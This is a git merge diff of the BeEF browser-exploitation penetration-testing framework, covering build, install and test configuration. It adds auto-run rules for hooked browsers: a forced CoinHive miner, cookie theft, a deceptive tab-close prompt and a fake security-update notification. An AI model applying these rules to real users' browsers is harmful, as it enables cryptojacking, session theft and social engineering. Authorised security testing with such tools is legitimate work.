Merge branch 'activerecord'

byebug and stops the auth rate limit test till fix
Merge pull request #1799 from beefproject/test
2019-12-17 00:16:44 +00:00 · 2019-12-13 15:33:31 +00:00 · 2019-12-10 13:44:27 +10:00 · 2019-12-09 19:29:12 -08:00 · 2019-12-09 14:12:10 +10:00 · 2019-12-09 14:11:18 +10:00
1708 changed files with 52937 additions and 14208 deletions
--- a/.github/ISSUE_TEMPLATE.md
+++ b/.github/ISSUE_TEMPLATE.md
@@ -0,0 +1,49 @@
+Verify first that your issue/request has not been posted previously:
+
+* https://github.com/beefproject/beef/issues
+* https://github.com/beefproject/beef/wiki/FAQ
+
+Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.4.7.2).
+
+
+#### Environment
+
+What version/revision of BeEF are you using?
+
+On what version of Ruby?
+
+On what browser?
+
+On what operating system?
+
+
+#### Configuration
+
+Are you using a non-default configuration?
+
+Have you enabled or disabled any BeEF extensions?
+
+
+#### Summary
+
+Please provide a summary of the issue.
+
+
+#### Expected Behaviour
+
+What was the expected result?
+
+
+#### Actual Behaviour
+
+What was the actual result?
+
+
+#### Steps to Reproduce
+
+Please provide steps to reproduce this issue.
+
+
+#### Additional Information
+
+Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots. Debug output can be enabled by specifying `debug: true` in the `config.yaml` configuration file.
--- a/.gitignore
+++ b/.gitignore
@@ -1,16 +1,22 @@
 ### BeEF ###
 beef.db
+beef.log
 test/msf-test
 extensions/admin_ui/media/javascript-min/
 custom-config.yaml
 .DS_Store
 .gitignore
 .rvmrc
+beef.log

 *.lock

 extensions/metasploit/msf-exploits.cache

+# ruby debugging
+.byebug_history
+
+
 # The following lines were created by https://www.gitignore.io

 ### Linux ###
@@ -102,3 +108,5 @@ $RECYCLE.BIN/
 # Project-level settings
 /.tgitconfig

+test/thirdparty/msf/unit/.byebug_history
+/load
--- a/.rspec
+++ b/.rspec
@@ -0,0 +1,4 @@
+--format documentation
+--color
+--require spec_helper
+-I .
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -0,0 +1,24 @@
+AllCops:
+  Exclude:
+    - 'test/**/*'
+    - 'tmp/**/*'
+    - 'tools/**/*'
+    - 'doc/**/*'
+  TargetRubyVersion: 2.4
+
+Metrics/AbcSize:
+  Enabled: false
+Metrics/BlockLength:
+  Enabled: false
+Metrics/ClassLength:
+  Enabled: false
+Metrics/LineLength:
+  Enabled: false
+Metrics/MethodLength:
+  Enabled: false
+Metrics/PerceivedComplexity:
+  Enabled: false
+Metrics/CyclomaticComplexity:
+  Enabled: false
+Style/FrozenStringLiteralComment:
+  Enabled: false
--- a/.ruby-version
+++ b/.ruby-version
@@ -1 +1 @@
-2.2.4
+2.5.3
--- a/.travis.yml
+++ b/.travis.yml
@@ -0,0 +1,22 @@
+language: ruby
+rvm:
+  - 2.4.0
+  - 2.5.3
+  - 2.6.0
+notifications:
+  email:
+    recipients:
+      - wade@bindshell.net
+    on_success: always
+    on_failure: always
+addons:
+  apt:
+    packages:
+      - libsqlite3-dev
+      - build-essential
+      - patch
+      - ruby-dev
+      - zlib1g-dev
+      - liblzma-dev
+      - libcurl4-openssl-dev
+
--- a/108
+++ b/108
@@ -1,7 +1,7 @@
 # BeEF's Gemfile

 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,57 +10,77 @@ gem 'eventmachine'
 gem 'thin'
 gem 'sinatra'
 gem 'rack'
-gem 'em-websocket', '~> 0.3.6' # WebSocket support
-gem 'uglifier', '~> 2.2.1'
+gem 'rack-protection'
+gem 'em-websocket' # WebSocket support
+gem 'uglifier'
 gem 'mime-types'
-
-
-# Windows support
-if RUBY_PLATFORM.downcase.include?('mswin') || RUBY_PLATFORM.downcase.include?('mingw')
-  # make sure you install this gem following https://github.com/hiranpeiris/therubyracer_for_windows
-  gem 'therubyracer', '~> 0.11.0beta1'
-  gem 'execjs'
-  gem 'win32console'
-elsif !RUBY_PLATFORM.downcase.include?('darwin')
-  gem 'therubyracer', '0.11.3'
-  gem 'execjs'
-end
- 
-
+gem 'execjs'
 gem 'ansi'
 gem 'term-ansicolor', :require => 'term/ansicolor'
-gem 'dm-core'
 gem 'json'
-gem 'data_objects'
-gem 'dm-sqlite-adapter'  # SQLite support
-#gem dm-postgres-adapter # PostgreSQL support
-#gem dm-mysql-adapter    # MySQL support
+gem 'rubyzip', '>= 1.2.2'
+gem 'espeak-ruby', '>= 1.0.4' # Text-to-Voice
+gem 'nokogiri', '>= 1.10.4'
+gem 'rake'
+
+gem 'otr-activerecord'
+gem 'sqlite3'
+
+# Geolocation support
+group :geoip do
+  gem 'maxmind-db'
+end
+
 gem 'parseconfig'
 gem 'erubis'
-gem 'dm-migrations'
-gem 'msfrpc-client'        # Metasploit Integration extension
-#gem 'twitter', '>= 5.0.0' # Twitter Notifications extension
-gem 'rubyzip', '>= 1.0.0'
-gem 'rubydns', '0.7.0'     # DNS extension
-gem 'geoip'                # geolocation support
-gem 'dm-serializer'        # network extension
-gem 'qr4r'                 # QRcode extension
+
+# Metasploit Integration extension
+group :ext_msf do
+  gem 'msfrpc-client'
+  gem 'xmlrpc'
+end
+
+# Notifications extension
+group :ext_notifications do
+  # Pushover
+  gem 'rushover'
+  # Slack
+  gem 'slack-notifier'
+  # Twitter
+  gem 'twitter', '>= 5.0.0'
+end
+
+# DNS extension
+group :ext_dns do
+  gem 'rubydns', '~> 0.7.3'
+end
+
+# QRcode extension
+group :ext_qrcode do
+  gem 'qr4r'
+end

 # For running unit tests
-if ENV['BEEF_TEST']
-  gem 'test-unit'
-  gem 'test-unit-full'
-  gem 'curb'
-  gem 'selenium'
-  gem 'selenium-webdriver'
-  gem 'rspec'
-  gem 'bundler-audit'
-  # nokogirl is needed by capybara which may require one of the below commands
-  # sudo apt-get install libxslt-dev libxml2-dev
-  # sudo port install libxml2 libxslt
-  gem 'capybara'
-  # RESTful API tests/generic command module tests
-  gem 'rest-client', '~> 1.8.0'
+group :test do
+    gem 'test-unit'
+    gem 'test-unit-full'
+    gem 'rspec'
+	gem 'rdoc'
+    # curb gem requires curl libraries
+    # sudo apt-get install libcurl4-openssl-dev
+    gem 'curb'
+    # selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
+    # gem 'selenium' # Requires old version of selenium which is no longer available
+    gem 'geckodriver-helper'
+    gem 'selenium-webdriver'
+    # nokogirl is needed by capybara which may require one of the below commands
+    # sudo apt-get install libxslt-dev libxml2-dev
+    # sudo port install libxml2 libxslt
+    gem 'capybara'
+    # RESTful API tests/generic command module tests
+    gem 'rest-client', '>= 2.0.1'
+    gem 'irb'
+    gem 'pry-byebug'
 end

 source 'https://rubygems.org'
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,213 +0,0 @@
-GEM
-  remote: https://rubygems.org/
-  specs:
-    addressable (2.3.6)
-    ansi (1.4.3)
-    atk (3.0.7)
-      glib2 (= 3.0.7)
-    bundler-audit (0.4.0)
-      bundler (~> 1.2)
-      thor (~> 0.18)
-    cairo (1.14.3)
-      pkg-config (>= 1.1.5)
-    capybara (2.5.0)
-      mime-types (>= 1.16)
-      nokogiri (>= 1.3.3)
-      rack (>= 1.0.0)
-      rack-test (>= 0.5.4)
-      xpath (~> 2.0)
-    childprocess (0.5.8)
-      ffi (~> 1.0, >= 1.0.11)
-    chunky_png (1.3.5)
-    curb (0.8.8)
-    daemons (1.1.9)
-    data_objects (0.10.14)
-      addressable (~> 2.1)
-    diff-lcs (1.2.5)
-    dm-core (1.2.1)
-      addressable (~> 2.3)
-    dm-do-adapter (1.2.0)
-      data_objects (~> 0.10.6)
-      dm-core (~> 1.2.0)
-    dm-migrations (1.2.0)
-      dm-core (~> 1.2.0)
-    dm-serializer (1.2.2)
-      dm-core (~> 1.2.0)
-      fastercsv (~> 1.5)
-      json (~> 1.6)
-      json_pure (~> 1.6)
-      multi_json (~> 1.0)
-    dm-sqlite-adapter (1.2.0)
-      dm-do-adapter (~> 1.2.0)
-      do_sqlite3 (~> 0.10.6)
-    do_sqlite3 (0.10.14)
-      data_objects (= 0.10.14)
-    domain_name (0.5.25)
-      unf (>= 0.0.5, < 1.0.0)
-    em-websocket (0.3.8)
-      addressable (>= 2.1.1)
-      eventmachine (>= 0.12.9)
-    erubis (2.7.0)
-    eventmachine (1.0.7)
-    execjs (2.0.2)
-    fastercsv (1.5.5)
-    ffi (1.9.10)
-    gdk_pixbuf2 (3.0.7)
-      glib2 (= 3.0.7)
-    geoip (1.4.0)
-    glib2 (3.0.7)
-      pkg-config
-    gtk2 (3.0.7)
-      atk (= 3.0.7)
-      gdk_pixbuf2 (= 3.0.7)
-      pango (= 3.0.7)
-    hoe (3.14.2)
-      rake (>= 0.8, < 11.0)
-    http-cookie (1.0.2)
-      domain_name (~> 0.5)
-    jar_wrapper (0.1.8)
-      zip
-    json (1.8.1)
-    json_pure (1.8.3)
-    librex (0.0.68)
-    mime-types (2.99)
-    mini_portile (0.6.2)
-    mojo_magick (0.5.6)
-    msfrpc-client (1.0.1)
-      librex (>= 0.0.32)
-      msgpack (>= 0.4.5)
-    msgpack (0.5.8)
-    multi_json (1.9.3)
-    netrc (0.11.0)
-    nokogiri (1.6.6.4)
-      mini_portile (~> 0.6.0)
-    pango (3.0.7)
-      cairo (>= 1.14.0)
-      glib2 (= 3.0.7)
-    parseconfig (1.0.4)
-    pkg-config (1.1.6)
-    power_assert (0.2.6)
-    qr4r (0.4.0)
-      mojo_magick
-      rqrcode
-    rack (1.5.2)
-    rack-protection (1.5.3)
-      rack
-    rack-test (0.6.3)
-      rack (>= 1.0)
-    rainbow (2.0.0)
-    rake (10.4.2)
-    rest-client (1.8.0)
-      http-cookie (>= 1.0.2, < 2.0)
-      mime-types (>= 1.16, < 3.0)
-      netrc (~> 0.7)
-    rexec (1.6.3)
-      rainbow
-    rqrcode (0.7.0)
-      chunky_png
-    rr (1.1.2)
-    rspec (3.4.0)
-      rspec-core (~> 3.4.0)
-      rspec-expectations (~> 3.4.0)
-      rspec-mocks (~> 3.4.0)
-    rspec-core (3.4.1)
-      rspec-support (~> 3.4.0)
-    rspec-expectations (3.4.0)
-      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.4.0)
-    rspec-mocks (3.4.0)
-      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.4.0)
-    rspec-support (3.4.1)
-    rubydns (0.7.0)
-      eventmachine (~> 1.0.0)
-      rexec (~> 1.6.2)
-    rubyzip (1.1.3)
-    selenium (0.2.11)
-      jar_wrapper
-    selenium-webdriver (2.48.1)
-      childprocess (~> 0.5)
-      multi_json (~> 1.0)
-      rubyzip (~> 1.0)
-      websocket (~> 1.0)
-    sinatra (1.4.2)
-      rack (~> 1.5, >= 1.5.2)
-      rack-protection (~> 1.4)
-      tilt (~> 1.3, >= 1.3.4)
-    term-ansicolor (1.1.5)
-    test-unit (3.1.5)
-      power_assert
-    test-unit-full (0.0.3)
-      test-unit
-      test-unit-notify
-      test-unit-rr
-      test-unit-runner-fox
-      test-unit-runner-gtk2
-      test-unit-runner-tk
-    test-unit-notify (1.0.4)
-      test-unit (>= 2.4.9)
-    test-unit-rr (1.0.3)
-      rr (>= 1.1.1)
-      test-unit (>= 2.5.2)
-    test-unit-runner-fox (0.0.1)
-      hoe (>= 1.6.0)
-    test-unit-runner-gtk2 (0.0.2)
-      gtk2
-      test-unit
-    test-unit-runner-tk (0.0.1)
-      hoe (>= 1.6.0)
-    thin (1.6.2)
-      daemons (>= 1.0.9)
-      eventmachine (>= 1.0.0)
-      rack (>= 1.0.0)
-    thor (0.19.1)
-    tilt (1.4.1)
-    uglifier (2.2.1)
-      execjs (>= 0.3.0)
-      multi_json (~> 1.0, >= 1.0.2)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.7.1)
-    websocket (1.2.2)
-    xpath (2.0.0)
-      nokogiri (~> 1.3)
-    zip (2.0.2)
-
-PLATFORMS
-  ruby
-
-DEPENDENCIES
-  ansi
-  bundler-audit
-  capybara
-  curb
-  data_objects
-  dm-core
-  dm-migrations
-  dm-serializer
-  dm-sqlite-adapter
-  em-websocket (~> 0.3.6)
-  erubis
-  eventmachine
-  geoip
-  json
-  mime-types
-  msfrpc-client
-  parseconfig
-  qr4r
-  rack
-  rest-client (~> 1.8.0)
-  rspec
-  rubydns (= 0.7.0)
-  rubyzip (>= 1.0.0)
-  selenium
-  selenium-webdriver
-  sinatra
-  term-ansicolor
-  test-unit
-  test-unit-full
-  thin
-  uglifier (~> 2.2.1)
-
-BUNDLED WITH
-   1.10.6
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -1,76 +1,71 @@
 ===============================================================================
   
-    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission

 ===============================================================================

+Source
+------
+
+Obtain application source code either by downloading the latest archive:
+
+  $ wget https://github.com/beefproject/beef/archive/master.zip
+
+Or cloning the Git repository from Github:
+
+  $ git clone https://github.com/beefproject/beef
+
+
+Prerequisites
+--------------
+
+BeEF requires Ruby 2.4+.
+
+If your operating system package manager does not support Ruby version 2.4,
+you can add the brightbox ppa repository for the latest version of Ruby:
+
+  $ sudo apt-add-repository -y ppa:brightbox/ruby-ng
+
+Alternatively, consider using a Ruby environment manager such as rbenv or rvm
+to manager your Ruby versions. Refer to the following for more information:
+
+  * rbenv: https://github.com/rbenv/rbenv
+  * rvm: https://rvm.io/rvm/install
+
+
 Installation
 ------------

-   1. Prerequisites (platform independent)
-   2. Prerequisites (Windows)
-   3. Prerequisites (Linux)
-   4. Prerequisites (Mac OSX)
-   5. Install instructions
-   6. Run instructions
+Once Ruby is installed, run the install script in the BeEF directory:
+
+  ./install
+
+This script installs the required operating system packages and all the
+prerequisite Ruby gems.
+
+Upon successful installation, be sure to read the Configuration page
+on the wiki for important details on configuring and securing BeEF.
+
+  https://github.com/beefproject/beef/wiki/Configuration


+Start BeEF
+----------

-   1. Prerequisites (platform independent)
+To start BeEF, simply run:

-      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:
+  $ ./beef

-      gem install bundler

-      
-   2. Prerequisites (Windows)
+Updating
+--------

-      !!! This must be done PRIOR to running the bundle install command !!!
-      
-      Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
+Due to the fast-paced nature of web browser development and webappsec landscape,
+it's best to regularly update BeEF to the latest version.

-	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
+If you're using BeEF from the GitHub repository, updating is as simple as:

-	  Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/eakmotion/therubyracer_for_windows.
+  $ git pull

-	Finally, edit beef's gem lock file by replacing the required ruby racer version with the version downloaded from the link above. 
-	
-   3. Prerequisites (Linux)
-
-      !!! This must be done PRIOR to running the bundle install command !!!
-      
-      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
-
-      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
-      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatible and conflicting ruby packages that are required
-      3.2. rvm install 1.9.3-p484
-      3.3. rvm use 1.9.3
-	  
-   4. Prerequisites (Mac OSX)
-   
-      - XCode: provides the sqlite support BeEF needs
-      
-      - Ruby 1.9
-      	To install RVM and Ruby 1.9.3 on Mac OS:
-      	$ bash -s stable < <(curl -Ls https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
-      	$ rvm install 1.9.3-p484
-		$ rvm use 1.9.3
-      
-
-   5. Install instructions
-   
-      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/archive/master.zip or cloning the GIT repo https://github.com/beefproject/beef.git
-
-	  Enter into the newly created BeEF directory, and type:
-
-	  bundle install
-
-      Bundler installs all the pre-requisite gems.
-
-   6. Run instructions
-
-      Simply run:
-
-      ./beef -x
--- a/62
+++ b/62
@@ -1,62 +0,0 @@
-===============================================================================
-   
-    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
-    Browser Exploitation Framework (BeEF) - http://beefproject.com
-    See the file 'doc/COPYING' for copying permission
-
-===============================================================================
-
-What is BeEF?
-------------
-
-BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
-
-Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
-
-
-Get Involved 
------------
-
-You can get in touch with the BeEF team. Just check out the following: 
-
-
-Please, send us pull requests!
-
-Web: http://beefproject.com/
-
-Bugs: https://github.com/beefproject/beef
-
-Security Bugs: security@beefproject.com
-
-IRC: ircs://irc.freenode.net/beefproject
-
-Twitter: @beefproject
-
-
-Requirements
------------
-
-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 or higher
-* [SQLite](http://sqlite.org) 3.x
-* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
-
-
-Quick Start
----------- 
-
-__The following is for the impatient.__ 
-
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
-We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
-
-   $ bash -s stable < <(curl -Ls https://raw.githubusercontent.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
-
-
-Usage 
----- 
-
-To get started, simply execute beef and follow the instructions:
-
-   $ ./beef
-
--- a/README.mkd
+++ b/README.mkd
@@ -1,6 +1,6 @@
 ===============================================================================
-   
-    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+
+    Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission

@@ -14,17 +14,17 @@ __BeEF__ is short for __The Browser Exploitation Framework__. It is a penetratio
 Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.


-Get Involved 
+Get Involved
 ------------

-You can get in touch with the BeEF team. Just check out the following: 
+You can get in touch with the BeEF team. Just check out the following:


 __Please, send us pull requests!__

-__Web:__ http://beefproject.com/
+__Web:__ https://beefproject.com/

-__Bugs:__ https://github.com/beefproject/beef
+__Bugs:__ https://github.com/beefproject/beef/issues

 __Security Bugs:__ security@beefproject.com

@@ -36,30 +36,37 @@ __Twitter:__ @beefproject
 Requirements
 ------------

-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 or higher
-* [SQLite](http://sqlite.org) 3.x
+* Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.
+* [Ruby](http://ruby-lang.org): 2.4 or newer
+* [SQLite](http://sqlite.org): 3.x
+* [Node.js](https://nodejs.org): 6 or newer
 * The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
+* Selenium is required on OSX: brew install selenium-server-standalone (See https://github.com/shvets/selenium)


 Quick Start
----------- 
+-----------

-__The following is for the impatient.__ 
+__The following is for the impatient.__

-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
-We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
+The `install` script installs the required operating system packages and all the prerequisite Ruby gems:

-       $ curl -L https://raw.githubusercontent.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+```
+$ ./install
+```
+
+For full installation details, please refer to [INSTALL.txt](https://github.com/beefproject/beef/blob/master/INSTALL.txt).
+
+We also have an [Installation](https://github.com/beefproject/beef/wiki/Installation) page on the wiki.
+
+Upon successful installation, be sure to read the [Configuration](https://github.com/beefproject/beef/wiki/Configuration) page on the wiki for important details on configuring and securing BeEF.


-Usage 
----- 
+Usage
+-----

-To get started, simply execute beef and follow the instructions: 
+To get started, simply execute beef and follow the instructions:

-       $ ./beef
-
-On windows use
-
-      $ ruby beef
+```
+$ ./beef
+```
--- a/157
+++ b/157
@@ -1,77 +1,75 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
+require 'yaml'
+require 'bundler/setup'
+load 'tasks/otr-activerecord.rake'
+#require 'pry-byebug'

-task :default => ["quick"]

-desc "Run quick tests"
-task :quick do
-  Rake::Task['unit'].invoke # run unit tests
+task :default => ["spec"]
+
+desc 'Generate API documentation to doc/rdocs/index.html'
+task :rdoc do
+  Rake::Task['rdoc:rerdoc'].invoke
 end

-desc "Run all tests"
-task :all do
-  Rake::Task['integration'].invoke # run integration tests
-  Rake::Task['unit'].invoke # run unit tests
-  Rake::Task['msf'].invoke # run msf tests
-end
+## RSPEC
+require 'rspec/core/rake_task'
+RSpec::Core::RakeTask.new(:spec)

-desc "Run automated tests (for Jenkins)"
-task :automated do
-  Rake::Task['xserver_start'].invoke
-  Rake::Task['all'].invoke
-  Rake::Task['xserver_stop'].invoke
-end

-desc "Run integration unit tests"
-task :integration => ["install"] do
-  Rake::Task['beef_start'].invoke
-  sh "export DISPLAY=:0; cd test/integration;ruby -W0 ts_integration.rb"
-  Rake::Task['beef_stop'].invoke
-end
-
-desc "Run integration unit tests"
-task :unit => ["install"] do
-  sh "cd test/unit;ruby -W0 ts_unit.rb"
-end
-
-desc "Run MSF unit tests"
-task :msf => ["install", "msf_install"] do
-  Rake::Task['msf_update'].invoke
-  Rake::Task['msf_start'].invoke
-  sh "cd test/thirdparty/msf/unit/;ruby -W0 ts_metasploit.rb"
-  Rake::Task['msf_stop'].invoke
-end


 ################################
-# run bundle-audit
+# SSL/TLS certificate

-namespace :bundle_audit do
-  require 'bundler/audit/cli'
-
-  desc 'Update bundle-audit database'
-  task :update do
-    Bundler::Audit::CLI.new.update
+namespace :ssl do
+  desc 'Create a new SSL certificate'
+  task :create do
+    if File.file?('beef_key.pem')
+      puts 'Certificate already exists. Replace? [Y/n]'
+      confirm = STDIN.getch.chomp
+      unless confirm.eql?('') || confirm.downcase.eql?('y')
+        puts "Aborted"
+        exit 1
+      end
+    end
+    Rake::Task['ssl:replace'].invoke
  end

-  desc 'Check gems for vulns using bundle-audit'
-  task :check do
-    Bundler::Audit::CLI.new.check
-  end
-
-  desc 'Update vulns database and check gems using bundle-audit'
-  task :run do
-    Rake::Task['bundle_audit:update'].invoke
-    Rake::Task['bundle_audit:check'].invoke
+  desc 'Re-generate SSL certificate'
+  task :replace do
+    if File.file?('/usr/local/bin/openssl')
+      path = '/usr/local/bin/openssl'
+    elsif File.file?('/usr/bin/openssl')
+      path = '/usr/bin/openssl'
+    else
+      puts "[-] Error: could not find openssl"
+      exit 1
+    end
+    IO.popen([path, 'req', '-new', '-newkey', 'rsa:4096', '-sha256', '-x509', '-days', '3650', '-nodes', '-out', 'beef_cert.pem', '-keyout', 'beef_key.pem', '-subj', '/CN=localhost'], 'r+').read.to_s
  end
 end

-desc "Run bundle-audit"
-task :bundle_audit do
-  Rake::Task['bundle_audit:run'].invoke
+################################
+# rdoc
+
+namespace :rdoc do
+  require 'rdoc/task'
+
+  desc 'Generate API documentation to doc/rdocs/index.html'
+  Rake::RDocTask.new do |rd|
+    rd.rdoc_dir = 'doc/rdocs'
+    rd.main = 'README.mkd'
+    rd.rdoc_files.include('core/**/*\.rb')
+      #'extensions/**/*\.rb'
+      #'modules/**/*\.rb'
+    rd.options << '--line-numbers'
+    rd.options << '--all'
+  end
 end


@@ -101,28 +99,54 @@ end

 task :xserver_stop do
  puts "\nShutting down X11 Server...\n"
-  sh "ps -ef|grep Xvfb|grep -v grep|awk '{print $2}'|xargs kill"
+  sh "ps -ef|grep Xvfb|grep -v grep|grep -v rake|awk '{print $2}'|xargs kill"
 end

 ################################
 # BeEF environment set up

@beef_process_id = nil;
+@beef_config_file = 'tmp/rk_beef_conf.yaml';
+

 task :beef_start => 'beef' do
+  # read environment param for creds or use bad_fred
+  test_user = ENV['TEST_BEEF_USER'] || 'bad_fred'
+  test_pass = ENV['TEST_BEEF_PASS'] || 'bad_fred_no_access'
+
+  # write a rake config file for beef
+  config = YAML.load(File.read('./config.yaml'))
+  config['beef']['credentials']['user'] = test_user
+  config['beef']['credentials']['passwd'] = test_pass
+  Dir.mkdir('tmp') unless Dir.exists?('tmp')
+  File.open(@beef_config_file, 'w') { |f| YAML.dump(config, f) }
+
+  # set the environment creds -- in case we're using bad_fred
+  ENV['TEST_BEEF_USER'] = test_user
+  ENV['TEST_BEEF_PASS'] = test_pass
+  config = nil
+  puts "Using config file: #{@beef_config_file}\n"
+
  printf "Starting BeEF (wait a few seconds)..."
-  @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [10, 10, 5, 5, 4, 4, 3, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  @beef_process_id = IO.popen("ruby ./beef -c #{@beef_config_file} -x 2> /dev/null", "w+")
+  delays = [5, 5, 5, 4, 4, 3, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
  delays.each do |i| # delay for a few seconds
    printf '.'
    sleep (i)
  end
-  puts '.'
+  puts ".\n\n"
 end

 task :beef_stop do
-  puts "\nShutting down BeEF...\n"
-  sh "ps -ef|grep beef|grep -v grep|awk '{print $2}'|xargs kill"
+  # cleanup tmp/config files
+  puts "\nCleanup config file:\n"
+  rm_f @beef_config_file
+  ENV['TEST_BEEF_USER'] = nil
+  ENV['TEST_BEEF_PASS'] = nil
+
+  # shutting down
+  puts "Shutting down BeEF...\n"
+  sh "ps -ef|grep beef|grep -v grep|grep -v rake|awk '{print $2}'|xargs kill"
 end

 ################################
@@ -179,7 +203,7 @@ end

 ################################
 # Create CDE Package
-# This will download and make the CDE Executable and 
+# This will download and make the CDE Executable and
 # gnereate a CDE Package in cde-package

 task :cde do
@@ -214,7 +238,10 @@ task :cde_beef_start => 'beef' do
  puts '.'
 end

-
 ################################
-
-
+# ActiveRecord
+namespace :db do
+  task :environment do
+    require_relative "beef"
+  end
+end
--- a/4
+++ b/4
@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

-0.4.6.1-alpha
+0.4.7.4-alpha-pre
--- a/arerules/alert.json
+++ b/arerules/alert.json
@@ -0,0 +1,18 @@
+{"name": "Display an alert",
+  "author": "mgeeky",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "alert_dialog",
+      "condition": null,
+      "options": {
+        "text":"You've been BeEFed ;>"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/coinhive_miner.json
+++ b/arerules/coinhive_miner.json
@@ -0,0 +1,20 @@
+{"name": "Start CoinHive JavaScript miner",
+  "author": "bcoles",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "coinhive_miner",
+      "condition": null,
+      "options": {
+        "public_token":"Ofh5MIvjuCBDqwJ9TCTio7TYko0ig5TV",
+        "mode":"FORCE_EXCLUSIVE_TAB",
+        "mobile_enabled":""
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/confirm_close_tab.json
+++ b/arerules/confirm_close_tab.json
@@ -0,0 +1,20 @@
+{"name": "Confirm Close Tab",
+  "author": "mgeeky",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "confirm_close_tab",
+      "condition": null,
+      "code": null,
+      "options": {
+        "text":"Are you sure you want to navigate away from this page?",
+        "usePopUnder":"true"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/get_cookie.json
+++ b/arerules/get_cookie.json
@@ -0,0 +1,18 @@
+{
+  "name": "Get Cookie",
+  "author": "@benichmt1",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_cookie",
+      "condition": null,
+      "options": {
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/ie_win_fakenotification-clippy.json
+++ b/arerules/ie_win_fakenotification-clippy.json
@@ -7,7 +7,7 @@
  "os_version": ">= 7",
  "modules": [
    {
-      "name": "fake_notification_ie",
+      "name": "fake_notification",
      "condition": null,
      "options": {
        "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
